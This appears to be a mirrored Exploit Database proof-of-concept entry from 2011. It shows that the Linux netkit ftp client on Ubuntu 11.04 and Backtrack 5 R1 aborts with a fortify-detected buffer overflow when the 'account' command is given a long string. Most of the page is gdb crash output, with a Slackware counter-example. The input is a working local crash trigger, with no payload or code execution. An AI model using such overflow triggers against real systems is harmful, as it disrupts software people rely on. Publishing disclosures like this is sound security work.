FTP Client (Ubuntu 11.04) – Local Buffer Overflow Crash (PoC)

Exploit Database
83 阅读
作者： localh0t

日期： 2011-09-08
类别：
- dos
平台：
- linux
来源：https://www.exploit-db.com/exploits/17806/
Ubuntu 11 (and below) ftp client seems to crash when passing large arguments to the "account" command, while a connection is made to any ftp server. Example:

Ubuntu 11.04 x86:
=================

(gdb) run 10.0.0.8
Starting program: /usr/bin/ftp 10.0.0.8
Connected to 10.0.0.8.
220 debianita FTP server ready.
Name (10.0.0.8:kron0): anonymous
331 Guest login ok, send your complete e-mail address as password.
Password:
230-Welcome, archive user ftp@10.0.0.9 !
230 Guest login ok, access restrictions apply.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> account AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
*** buffer overflow detected ***: /usr/bin/ftp terminated
======= Backtrace: =========
/lib/i386-linux-gnu/libc.so.6(__fortify_fail+0x50)[0x27fdf0]
/lib/i386-linux-gnu/libc.so.6(+0xe4cca)[0x27ecca]
/lib/i386-linux-gnu/libc.so.6(+0xe41ed)[0x27e1ed]
/usr/bin/ftp[0x804b5e2]
/usr/bin/ftp[0x8055ead]
/lib/i386-linux-gnu/libc.so.6(__libc_start_main+0xe7)[0x1b0e37]
/usr/bin/ftp[0x8049d61]
======= Memory map: ========
00110000-0012c000 r-xp 00000000 08:01 525108 /lib/i386-linux-gnu/ld-2.13.so
0012c000-0012d000 r--p 0001b000 08:01 525108 /lib/i386-linux-gnu/ld-2.13.so
0012d000-0012e000 rw-p 0001c000 08:01 525108 /lib/i386-linux-gnu/ld-2.13.so
0012e000-0012f000 r-xp 00000000 00:00 0[vdso]
0012f000-0015d000 r-xp 00000000 08:01 524378 /lib/libreadline.so.6.2
0015d000-0015e000 r--p 0002e000 08:01 524378 /lib/libreadline.so.6.2
0015e000-00161000 rw-p 0002f000 08:01 524378 /lib/libreadline.so.6.2
00161000-00162000 rw-p 00000000 00:00 0
00162000-00196000 r-xp 00000000 08:01 524347 /lib/libncurses.so.5.7
00196000-00197000 ---p 00034000 08:01 524347 /lib/libncurses.so.5.7
00197000-00199000 r--p 00034000 08:01 524347 /lib/libncurses.so.5.7
00199000-0019a000 rw-p 00036000 08:01 524347 /lib/libncurses.so.5.7
0019a000-002f4000 r-xp 00000000 08:01 525121 /lib/i386-linux-gnu/libc-2.13.so
002f4000-002f5000 ---p 0015a000 08:01 525121 /lib/i386-linux-gnu/libc-2.13.so
002f5000-002f7000 r--p 0015a000 08:01 525121 /lib/i386-linux-gnu/libc-2.13.so
002f7000-002f8000 rw-p 0015c000 08:01 525121 /lib/i386-linux-gnu/libc-2.13.so
002f8000-002fb000 rw-p 00000000 00:00 0
002fb000-002fd000 r-xp 00000000 08:01 525131 /lib/i386-linux-gnu/libdl-2.13.so
002fd000-002fe000 r--p 00001000 08:01 525131 /lib/i386-linux-gnu/libdl-2.13.so
002fe000-002ff000 rw-p 00002000 08:01 525131 /lib/i386-linux-gnu/libdl-2.13.so
002ff000-00309000 r-xp 00000000 08:01 525167 /lib/i386-linux-gnu/libnss_files-2.13.so
00309000-0030a000 r--p 00009000 08:01 525167 /lib/i386-linux-gnu/libnss_files-2.13.so
0030a000-0030b000 rw-p 0000a000 08:01 525167 /lib/i386-linux-gnu/libnss_files-2.13.so
0030b000-00311000 r-xp 00000000 08:01 525163 /lib/i386-linux-gnu/libnss_compat-2.13.so
00311000-00312000 r--p 00005000 08:01 525163 /lib/i386-linux-gnu/libnss_compat-2.13.so
00312000-00313000 rw-p 00006000 08:01 525163 /lib/i386-linux-gnu/libnss_compat-2.13.so
00313000-00326000 r-xp 00000000 08:01 525161 /lib/i386-linux-gnu/libnsl-2.13.so
00326000-00327000 r--p 00012000 08:01 525161 /lib/i386-linux-gnu/libnsl-2.13.so
00327000-00328000 rw-p 00013000 08:01 525161 /lib/i386-linux-gnu/libnsl-2.13.so
00328000-0032a000 rw-p 00000000 00:00 0
0032a000-00333000 r-xp 00000000 08:01 525171 /lib/i386-linux-gnu/libnss_nis-2.13.so
00333000-00334000 r--p 00008000 08:01 525171 /lib/i386-linux-gnu/libnss_nis-2.13.so
00334000-00335000 rw-p 00009000 08:01 525171 /lib/i386-linux-gnu/libnss_nis-2.13.so
00335000-0034f000 r-xp 00000000 08:01 525149 /lib/i386-linux-gnu/libgcc_s.so.1
0034f000-00350000 r--p 00019000 08:01 525149 /lib/i386-linux-gnu/libgcc_s.so.1
00350000-00351000 rw-p 0001a000 08:01 525149 /lib/i386-linux-gnu/libgcc_s.so.1
08048000-08059000 r-xp 00000000 08:01 1573707/usr/bin/netkit-ftp
08059000-0805a000 r--p 00011000 08:01 1573707/usr/bin/netkit-ftp
0805a000-0805b000 rw-p 00012000 08:01 1573707/usr/bin/netkit-ftp
0805b000-080ab000 rw-p 00000000 00:00 0[heap]
b7dee000-b7fee000 r--p 00000000 08:01 1581098/usr/lib/locale/locale-archive
b7fee000-b7ff0000 rw-p 00000000 00:00 0
b7ff9000-b7ffa000 r--p 002a1000 08:01 1581098/usr/lib/locale/locale-archive
b7ffa000-b8000000 rw-p 00000000 00:00 0
bffdf000-c0000000 rw-p 00000000 00:00 0[stack]

Program received signal SIGABRT, Aborted.
0x0012e416 in __kernel_vsyscall ()
(gdb) i r
eax0x00
ecx0xc8e3214
edx0x66
ebx0xc8e3214
esp0xbfffdde40xbfffdde4
ebp0xbfffddf00xbfffddf0
esi0x00
edi0x2f6ff43108852
eip0x12e4160x12e416 <__kernel_vsyscall+2>
eflags 0x246[ PF ZF IF ]
cs 0x73115
ss 0x7b123
ds 0x7b123
es 0x7b123
fs 0x00
gs 0x3351
(gdb)

============================================================================================================================================================

Ubuntu 11.04 x64 and Backtrack 5 R1 (which is based in Ubuntu) crash, too:
==========================================================================

Ubuntu 11.04 x64:
=================

$ gdb /usr/bin/ftp
GNU gdb (Ubuntu/Linaro 7.2-1ubuntu11) 7.2
Copyright (C) 2010 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Para las instrucciones de informe de errores, vea:
<http://www.gnu.org/software/gdb/bugs/>...
Leyendo símbolos desde /usr/bin/ftp...(no se encontraron símbolos de depuración)hecho.
(gdb) run 10.0.0.8
Starting program: /usr/bin/ftp 10.0.0.8
Connected to 10.0.0.8.
220 debianita FTP server ready.
Name (10.0.0.8:kron0): anonymous
331 Guest login ok, send your complete e-mail address as password.
Password:
230-Welcome, archive user ftp@10.0.0.5 !
230 Guest login ok, access restrictions apply.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> account AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
*** buffer overflow detected ***: /usr/bin/ftp terminated
======= Backtrace: =========
/lib/x86_64-linux-gnu/libc.so.6(__fortify_fail+0x37)[0x7ffff76c01d7]
/lib/x86_64-linux-gnu/libc.so.6(+0xfd0f0)[0x7ffff76bf0f0]
/lib/x86_64-linux-gnu/libc.so.6(+0xfc264)[0x7ffff76be264]
/usr/bin/ftp[0x404039]
/usr/bin/ftp[0x40ec18]
/lib/x86_64-linux-gnu/libc.so.6(__libc_start_main+0xff)[0x7ffff75e0eff]
/usr/bin/ftp[0x402889]
======= Memory map: ========
00400000-00414000 r-xp 00000000 08:03 262461 /usr/bin/netkit-ftp
00613000-00614000 r--p 00013000 08:03 262461 /usr/bin/netkit-ftp
00614000-00616000 rw-p 00014000 08:03 262461 /usr/bin/netkit-ftp
00616000-00687000 rw-p 00000000 00:00 0[heap]
7ffff62e2000-7ffff62f7000 r-xp 00000000 08:03 1442972/lib/x86_64-linux-gnu/libgcc_s.so.1
7ffff62f7000-7ffff64f6000 ---p 00015000 08:03 1442972/lib/x86_64-linux-gnu/libgcc_s.so.1
7ffff64f6000-7ffff64f7000 r--p 00014000 08:03 1442972/lib/x86_64-linux-gnu/libgcc_s.so.1
7ffff64f7000-7ffff64f8000 rw-p 00015000 08:03 1442972/lib/x86_64-linux-gnu/libgcc_s.so.1
7ffff64f8000-7ffff6b82000 r--p 00000000 08:03 269561 /usr/lib/locale/locale-archive
7ffff6b82000-7ffff6b8d000 r-xp 00000000 08:03 1442994/lib/x86_64-linux-gnu/libnss_nis-2.13.so
7ffff6b8d000-7ffff6d8c000 ---p 0000b000 08:03 1442994/lib/x86_64-linux-gnu/libnss_nis-2.13.so
7ffff6d8c000-7ffff6d8d000 r--p 0000a000 08:03 1442994/lib/x86_64-linux-gnu/libnss_nis-2.13.so
7ffff6d8d000-7ffff6d8e000 rw-p 0000b000 08:03 1442994/lib/x86_64-linux-gnu/libnss_nis-2.13.so
7ffff6d8e000-7ffff6da5000 r-xp 00000000 08:03 1442984/lib/x86_64-linux-gnu/libnsl-2.13.so
7ffff6da5000-7ffff6fa4000 ---p 00017000 08:03 1442984/lib/x86_64-linux-gnu/libnsl-2.13.so
7ffff6fa4000-7ffff6fa5000 r--p 00016000 08:03 1442984/lib/x86_64-linux-gnu/libnsl-2.13.so
7ffff6fa5000-7ffff6fa6000 rw-p 00017000 08:03 1442984/lib/x86_64-linux-gnu/libnsl-2.13.so
7ffff6fa6000-7ffff6fa8000 rw-p 00000000 00:00 0
7ffff6fa8000-7ffff6fb0000 r-xp 00000000 08:03 1442986/lib/x86_64-linux-gnu/libnss_compat-2.13.so
7ffff6fb0000-7ffff71af000 ---p 00008000 08:03 1442986/lib/x86_64-linux-gnu/libnss_compat-2.13.so
7ffff71af000-7ffff71b0000 r--p 00007000 08:03 1442986/lib/x86_64-linux-gnu/libnss_compat-2.13.so
7ffff71b0000-7ffff71b1000 rw-p 00008000 08:03 1442986/lib/x86_64-linux-gnu/libnss_compat-2.13.so
7ffff71b1000-7ffff71bd000 r-xp 00000000 08:03 1442990/lib/x86_64-linux-gnu/libnss_files-2.13.so
7ffff71bd000-7ffff73bc000 ---p 0000c000 08:03 1442990/lib/x86_64-linux-gnu/libnss_files-2.13.so
7ffff73bc000-7ffff73bd000 r--p 0000b000 08:03 1442990/lib/x86_64-linux-gnu/libnss_files-2.13.so
7ffff73bd000-7ffff73be000 rw-p 0000c000 08:03 1442990/lib/x86_64-linux-gnu/libnss_files-2.13.so
7ffff73be000-7ffff73c0000 r-xp 00000000 08:03 1442954/lib/x86_64-linux-gnu/libdl-2.13.so
7ffff73c0000-7ffff75c0000 ---p 00002000 08:03 1442954/lib/x86_64-linux-gnu/libdl-2.13.so
7ffff75c0000-7ffff75c1000 r--p 00002000 08:03 1442954/lib/x86_64-linux-gnu/libdl-2.13.so
7ffff75c1000-7ffff75c2000 rw-p 00003000 08:03 1442954/lib/x86_64-linux-gnu/libdl-2.13.so
7ffff75c2000-7ffff774c000 r-xp 00000000 08:03 1442944/lib/x86_64-linux-gnu/libc-2.13.so
7ffff774c000-7ffff794b000 ---p 0018a000 08:03 1442944/lib/x86_64-linux-gnu/libc-2.13.so
7ffff794b000-7ffff794f000 r--p 00189000 08:03 1442944/lib/x86_64-linux-gnu/libc-2.13.so
7ffff794f000-7ffff7950000 rw-p 0018d000 08:03 1442944/lib/x86_64-linux-gnu/libc-2.13.so
7ffff7950000-7ffff7956000 rw-p 00000000 00:00 0
7ffff7956000-7ffff7996000 r-xp 00000000 08:03 1439035/lib/libncurses.so.5.7
7ffff7996000-7ffff7b95000 ---p 00040000 08:03 1439035/lib/libncurses.so.5.7
7ffff7b95000-7ffff7b99000 r--p 0003f000 08:03 1439035/lib/libncurses.so.5.7
7ffff7b99000-7ffff7b9a000 rw-p 00043000 08:03 1439035/lib/libncurses.so.5.7
7ffff7b9a000-7ffff7bd3000 r-xp 00000000 08:03 1439066/lib/libreadline.so.6.2
7ffff7bd3000-7ffff7dd3000 ---p 00039000 08:03 1439066/lib/libreadline.so.6.2
7ffff7dd3000-7ffff7dd5000 r--p 00039000 08:03 1439066/lib/libreadline.so.6.2
7ffff7dd5000-7ffff7ddb000 rw-p 0003b000 08:03 1439066/lib/libreadline.so.6.2
7ffff7ddb000-7ffff7ddc000 rw-p 00000000 00:00 0
7ffff7ddc000-7ffff7dfd000 r-xp 00000000 08:03 1442931/lib/x86_64-linux-gnu/ld-2.13.so
7ffff7fcf000-7ffff7fd3000 rw-p 00000000 00:00 0
7ffff7ff5000-7ffff7ffb000 rw-p 00000000 00:00 0
7ffff7ffb000-7ffff7ffc000 r-xp 00000000 00:00 0[vdso]
7ffff7ffc000-7ffff7ffd000 r--p 00020000 08:03 1442931/lib/x86_64-linux-gnu/ld-2.13.so
7ffff7ffd000-7ffff7fff000 rw-p 00021000 08:03 1442931/lib/x86_64-linux-gnu/ld-2.13.so
7ffffffde000-7ffffffff000 rw-p 00000000 00:00 0[stack]
ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0[vsyscall]

Program received signal SIGABRT, Aborted.
0x00007ffff75f5d05 in raise (sig=6) at ../nptl/sysdeps/unix/sysv/linux/raise.c:64
64../nptl/sysdeps/unix/sysv/linux/raise.c: No existe el fichero o el directorio.
in ../nptl/sysdeps/unix/sysv/linux/raise.c
(gdb) i r
rax0x00
rbx0x00
rcx0xffffffffffffffff-1
rdx0x66
rsi0x5dea24042
rdi0x5dea24042
rbp0x7fffffffcfd00x7fffffffcfd0
rsp0x7fffffffc6080x7fffffffc608
r8 0x7ffff770d8c0140737344755904
r9 0x4006604195936
r100x88
r110x246582
r120x99
r130x3a58
r140x3a58
r150x55
rip0x7ffff75f5d050x7ffff75f5d05 <raise+53>
eflags 0x246[ PF ZF IF ]
cs 0x3351
ss 0x2b43
ds 0x00
es 0x00
fs 0x00
gs 0x00
(gdb)

============================================================================================================================================================

Backtrack 5 R1:
===============

(gdb) run 10.0.0.8
Starting program: /usr/bin/ftp 10.0.0.8
Connected to 10.0.0.8.
220 debianita FTP server ready.
Name (10.0.0.8:root): anonymous
331 Guest login ok, send your complete e-mail address as password.
Password:
230 Guest login ok, access restrictions apply.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> account AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
*** buffer overflow detected ***: /usr/bin/ftp terminated
======= Backtrace: =========
/lib/tls/i686/cmov/libc.so.6(__fortify_fail+0x50)[0xb7eea390]
/lib/tls/i686/cmov/libc.so.6(+0xe12ca)[0xb7ee92ca]
/lib/tls/i686/cmov/libc.so.6(+0xe07de)[0xb7ee87de]
/usr/bin/ftp[0x804b57c]
/usr/bin/ftp[0x8055abd]
/lib/tls/i686/cmov/libc.so.6(__libc_start_main+0xe6)[0xb7e1ebd6]
/usr/bin/ftp[0x8049cb1]
======= Memory map: ========
08048000-08059000 r-xp 00000000 08:01 153580 /usr/bin/netkit-ftp
08059000-0805a000 r--p 00010000 08:01 153580 /usr/bin/netkit-ftp
0805a000-0805b000 rw-p 00011000 08:01 153580 /usr/bin/netkit-ftp
0805b000-0808a000 rw-p 00000000 00:00 0[heap]
b7d58000-b7d75000 r-xp 00000000 08:01 1180 /lib/libgcc_s.so.1
b7d75000-b7d76000 r--p 0001c000 08:01 1180 /lib/libgcc_s.so.1
b7d76000-b7d77000 rw-p 0001d000 08:01 1180 /lib/libgcc_s.so.1
b7d88000-b7d8f000 r--s 00000000 08:01 159757 /usr/lib/gconv/gconv-modules.cache
b7d8f000-b7dce000 r--p 00000000 08:01 161313 /usr/lib/locale/en_US.utf8/LC_CTYPE
b7dce000-b7dd6000 r-xp 00000000 08:01 5501 /lib/tls/i686/cmov/libnss_nis-2.11.1.so
b7dd6000-b7dd7000 r--p 00007000 08:01 5501 /lib/tls/i686/cmov/libnss_nis-2.11.1.so
b7dd7000-b7dd8000 rw-p 00008000 08:01 5501 /lib/tls/i686/cmov/libnss_nis-2.11.1.so
b7dd8000-b7deb000 r-xp 00000000 08:01 5491 /lib/tls/i686/cmov/libnsl-2.11.1.so
b7deb000-b7dec000 r--p 00012000 08:01 5491 /lib/tls/i686/cmov/libnsl-2.11.1.so
b7dec000-b7ded000 rw-p 00013000 08:01 5491 /lib/tls/i686/cmov/libnsl-2.11.1.so
b7ded000-b7def000 rw-p 00000000 00:00 0
b7def000-b7df5000 r-xp 00000000 08:01 5493 /lib/tls/i686/cmov/libnss_compat-2.11.1.so
b7df5000-b7df6000 r--p 00006000 08:01 5493 /lib/tls/i686/cmov/libnss_compat-2.11.1.so
b7df6000-b7df7000 rw-p 00007000 08:01 5493 /lib/tls/i686/cmov/libnss_compat-2.11.1.so
b7df7000-b7e01000 r-xp 00000000 08:01 5497 /lib/tls/i686/cmov/libnss_files-2.11.1.so
b7e01000-b7e02000 r--p 00009000 08:01 5497 /lib/tls/i686/cmov/libnss_files-2.11.1.so
b7e02000-b7e03000 rw-p 0000a000 08:01 5497 /lib/tls/i686/cmov/libnss_files-2.11.1.so
b7e03000-b7e04000 rw-p 00000000 00:00 0
b7e04000-b7e06000 r-xp 00000000 08:01 5486 /lib/tls/i686/cmov/libdl-2.11.1.so
b7e06000-b7e07000 r--p 00001000 08:01 5486 /lib/tls/i686/cmov/libdl-2.11.1.so
b7e07000-b7e08000 rw-p 00002000 08:01 5486 /lib/tls/i686/cmov/libdl-2.11.1.so
b7e08000-b7f5b000 r-xp 00000000 08:01 5480 /lib/tls/i686/cmov/libc-2.11.1.so
b7f5b000-b7f5c000 ---p 00153000 08:01 5480 /lib/tls/i686/cmov/libc-2.11.1.so
b7f5c000-b7f5e000 r--p 00153000 08:01 5480 /lib/tls/i686/cmov/libc-2.11.1.so
b7f5e000-b7f5f000 rw-p 00155000 08:01 5480 /lib/tls/i686/cmov/libc-2.11.1.so
b7f5f000-b7f63000 rw-p 00000000 00:00 0
b7f63000-b7f97000 r-xp 00000000 08:01 1200 /lib/libncurses.so.5.7
b7f97000-b7f98000 ---p 00034000 08:01 1200 /lib/libncurses.so.5.7
b7f98000-b7f9a000 r--p 00034000 08:01 1200 /lib/libncurses.so.5.7
b7f9a000-b7f9b000 rw-p 00036000 08:01 1200 /lib/libncurses.so.5.7
b7f9b000-b7fca000 r-xp 00000000 08:01 1267 /lib/libreadline.so.6.1
b7fca000-b7fcb000 r--p 0002e000 08:01 1267 /lib/libreadline.so.6.1
b7fcb000-b7fce000 rw-p 0002f000 08:01 1267 /lib/libreadline.so.6.1
b7fce000-b7fcf000 rw-p 00000000 00:00 0
b7fdc000-b7fe2000 rw-p 00000000 00:00 0
b7fe2000-b7fe3000 r-xp 00000000 00:00 0[vdso]
b7fe3000-b7ffe000 r-xp 00000000 08:01 1123 /lib/ld-2.11.1.so
b7ffe000-b7fff000 r--p 0001a000 08:01 1123 /lib/ld-2.11.1.so
b7fff000-b8000000 rw-p 0001b000 08:01 1123 /lib/ld-2.11.1.so
bffdf000-c0000000 rw-p 00000000 00:00 0[stack]

Program received signal SIGABRT, Aborted.
0xb7fe2422 in __kernel_vsyscall ()
(gdb) i r
eax0x00
ecx0x6591625
edx0x66
ebx0x6591625
esp0xbfffdbfc0xbfffdbfc
ebp0xbfffdc080xbfffdc08
esi0x00
edi0xb7f5dff4-1208623116
eip0xb7fe24220xb7fe2422 <__kernel_vsyscall+2>
eflags 0x200246[ PF ZF IF ID ]
cs 0x73115
ss 0x7b123
ds 0x7b123
es 0x7b123
fs 0x00
gs 0x3351
(gdb)

Another Linux distribution did not crash, here is the example with Slackware 12:
================================================================================

Slackware 12:
=============

root@sl4ck1e:~# ftp 10.0.0.8
Connected to 10.0.0.8.
220 debianita FTP server ready.
Name (10.0.0.8:root): anonymous
331 Guest login ok, send your complete e-mail address as password.
Password:
230 Guest login ok, access restrictions apply.
ftp> account AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
sorry, input line too long

ftp>